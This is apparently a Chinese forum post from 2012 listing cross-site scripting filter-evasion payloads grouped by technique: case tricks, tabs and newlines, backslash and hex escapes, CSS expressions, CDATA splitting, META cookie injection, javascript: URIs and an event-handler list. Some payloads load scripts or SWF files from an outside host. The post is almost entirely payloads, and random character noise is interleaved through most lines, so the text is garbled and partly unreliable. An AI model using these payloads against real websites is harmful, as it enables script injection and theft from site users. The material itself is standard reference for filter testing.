1. 改变字符大小写
' C, v7 c, c0 B
* Z L3 @& M5 e# k: A+ c- C8 a % M$ `3 }( Q1 y0 k
, q, }; a0 P4 A7 g* U
<sCript>alert(‘d’)</scRipT>
; y& O S. _5 D2 A
& m/ R/ \: }4 A. L2. 利用多加一些其它字符来规避Regular Expression的检查- M0 ~* Q; D) c' _) N
) v/ z% q* _) c9 A* _! {2 p5 N* q <<script>alert(‘c’)//<</script>, b, i8 J @$ P) C6 I
( I- N( n$ B" `& A3 e& |$ s
<SCRIPT a=">" SRC="t.js"></SCRIPT>9 N9 x1 _" ?7 U% m
b9 ?" h+ Y0 m, l9 J
<SCRIPT =">" SRC="t.js"></SCRIPT>: W. G4 E' \3 w' S/ R
$ B x$ K: m4 ?' E0 z. {- b0 ]6 ] <SCRIPT a=">" ” SRC="t.js"></SCRIPT>! v6 f9 Z: n+ e2 B, l2 s
: I9 V2 R% w! n* }0 W$ g
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>( l) q- l4 ^8 |$ m# T9 d& N4 U
9 e8 P( S; o# N6 T7 n1 v1 ^- M
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
+ _9 K/ P; O# g3 e Z
9 a6 I9 k7 E) _ J1 C <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
. x1 x5 _ I/ e* A) p- q( @( i! {$ }9 g: }9 B" Q: i" O6 J
3. 以其它扩展名取代.js
0 o7 p6 @9 O [+ c( ]7 q6 b3 }% s7 Z% R
<script src="bad.jpg"></script>4 [# y% D |" `' j H+ R
' ~/ @8 k% z- n0 r v" T0 c
4. 将Javascript写在CSS档里
( R/ d: e0 R, [# _0 Q
5 p! f0 ?. d/ N <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
) r' `- l# C1 j5 |
1 {" R8 J% v. e! ?' ~ example:- n8 W& ? [. R/ C6 Q, V6 ?
. M# Y: D* f! ~3 {
body {
, j. f$ f* P0 ?" h/ x0 b9 ~7 R6 D" U: X) c
background-image: url(‘javascript:alert("XSS");’)
5 [& i, Z- j, {# ]: ~/ ~- u; `3 k0 `( Z: n
}
" c( Q7 [. w% E A) G/ Z' Q( d+ \+ H1 v' z' {
5. 在script的tag里加入一些其它字符 P+ ^: `$ l+ b6 b" Q4 M+ I" q+ l
/ z5 J4 }* y# { <SCRIPT/SRC="t.js"></SCRIPT>
! k. _: j$ a! c* q1 i2 ~: i; n% \
<SCRIPT/anyword SRC="t.js"></SCRIPT>5 Q; C* d z! b2 f" E' I& |
4 |6 d$ q% \% ^+ c
6. 使用tab或是new line来规避4 ^; I$ z! |- c& L
; X! p& Z! P* i/ [2 l7 O! q <img src="jav ascr ipt:alert(‘XSS3′)">$ F' [7 W- l5 f9 m# l' X
" i. L$ J; D2 ~3 {; _ <img src="jav ascr ipt:alert(‘XSS3′)">( r4 L1 E& f* U0 O& J# F% E( j% [4 q- R
, |) E# \0 a+ ^
<IMG SRC="jav ascript:alert(‘XSS’);">: b/ ^. L/ b- G. R9 d
$ U4 s6 J* h$ K3 ~
-> tag
/ S* b! |2 G% W5 }/ F! n! t! l
/ }3 c$ ~7 ~, V. O6 k% o6 O -> new line7 ^4 ~1 z+ d6 h w6 ]5 j# n, K
% g- o v9 `3 t& | K
7. 使用"\"来规避
& {9 _3 z" `! l3 ]' r/ F
2 d# K. E; e8 I/ k$ i) Y! l <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>) S7 \1 C. m+ ?! X7 B/ E
( z: Q) h/ z: f& h+ U, x& |
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>- Z, x0 s( v N. x( j: _3 M# J
O Y# k& R" n
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
9 c9 D- M( K# `. W( h- c
6 z' M4 z# b& w, C* u <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">9 S/ S5 Y0 |* f
3 ~" j/ L: R0 W' g" d# G( z
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
1 D# s3 r7 L$ ~
( S9 z) ?" J6 J6 O4 |8. 使用Hex encode来规避(也可能会把";"拿掉)' U) Y; s2 x, Y* @; D) X) \
# o Z- _6 X% h$ ^7 } <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
) l* F7 T% `6 @7 F ^ n) A" k0 B, E% H( P, T. d5 k
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">6 w2 L2 K5 k) w" T5 c
9 Z C9 w# L1 p3 U <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">, R% V% i& c" \" _; @- I* f
& X, K- i0 V: F( Z 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">1 ]' B- k% U: L; N! [
3 o7 ~( ~7 I; s
9. script in HTML tag
1 |4 `7 S! _! u) ?- g l* c1 W4 [, ]; z6 c+ ^# p
<body onload=」alert(‘onload’)」>
- h+ \$ t( J* o/ t
# D% C7 |5 E! k; |7 R4 l; o onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload x+ |4 u5 z) M% s* n
1 e! g) b- E6 M6 E
10. 在swf里含有xss的code
4 M6 u- B* |' t3 @2 J7 {5 H2 D' c1 O+ e d
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
+ D& ]" m9 l5 Q' X* S
/ T" p$ J9 n+ z/ L9 p! H11. 利用CDATA将xss的code拆开,再组合起来。
6 s( _5 H4 x' F$ j- j9 k
" H; o- Y* z" |/ ~4 n <XML ID=I><X><C>
& c8 ^, ]! v. W
4 c( [2 I j- V& j <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
8 P; g" L, v9 c' x
3 T, F& t( b( x2 I" @ </C></X>
4 P' Z6 J2 }6 f" R7 [% Z& J9 w3 w7 R$ ?
</xml>/ j/ q# ?/ f& r
4 I# d" f$ W1 V
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
6 @/ W3 h+ I% E @6 s# ^8 A1 d
@% U5 H. e1 ~ <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
+ A* s" C9 g! i7 |* m# a8 S
- f4 R# N8 Q$ Y4 v# a <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>) x3 ]; n6 s L0 }$ h
# K1 u8 e! t7 \2 |& g
12. 利用HTML+TIME。7 q9 W8 {" Z, u* s. ?( e
; W, X7 @# y/ d. Y <HTML><BODY>
' K) b( z1 f# c4 u7 v
9 t& i7 y( A. I/ ^ <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">+ s- C3 \3 F6 {: R
1 ^5 r# ?2 p7 H5 ^% {
<?import namespace="t" implementation="#default#time2">
$ a G- \2 H U( }9 j3 u$ S6 r0 Q" z% o2 y3 B6 o+ ^
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">3 L7 ]' o: a) r& C" ?# |
) Y) S9 _" X7 ?% Z" e m </BODY></HTML>2 q* {- v$ X5 E6 C. _' F1 y
" g m8 x0 h: B; d8 j13. 透过META写入Cookie。
" L. l* t5 Q( X/ O; c
4 r& o9 t) G/ Z7 b) A- U X <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">8 V. Z3 [, d1 [
0 G2 O# b2 M4 W; v: l: ]+ |
14. javascript in src , href , url
; V6 r. g( G) j6 L0 d) ^/ R" |6 i, ^) q# Z" F6 Q
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
$ m$ Y& _, [* k) K+ {9 A/ W4 d4 }
<img src="javascript:alert(‘XSS3′)">" T" B* ], Y' e9 c' p2 z' U
( \8 _- f- s1 x: B2 w<IMG DYNSRC="javascript:alert(‘XSS20′)">
x" ^6 k: t3 g' l- r8 G1 ?4 G! P8 L5 S# ~7 @% j
<IMG LOWSRC="javascript:alert(‘XSS21′)">
: |9 G2 z# J. V3 U( D0 y5 J9 Q7 e
" f+ w" ^# k3 K( P# ? <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">1 y4 e& w4 q4 W0 R4 j, j
8 t0 j: d( L1 k3 R6 k: |: R
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>4 G5 A8 E2 v0 W3 b8 ]3 M
( H# @: F* [- X <TABLE BACKGROUND="javascript:alert(‘XSS29′)">& Q0 ]4 b* S5 H8 ~* |8 t
, R9 d! k; H, ^- X1 H
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
( g1 o+ H4 @3 A- t0 ]/ \! e
+ B! {$ p$ H( z' J+ L; a7 n& F V' W <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
( D1 m5 E* i }" J6 W, |0 L$ n0 R0 ^+ C& P% l( r9 V
</STYLE><A CLASS=XSS></A>+ h; z* o. }, b& f' C$ q
; Q2 p9 Q) Q# Y9 q( f8 A, K
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>; u, _' f8 l) j: c8 \
& Q) \* }( i n L/ X
|
发表于 2012-12-31 09:59:28
收藏
分享
支持
反对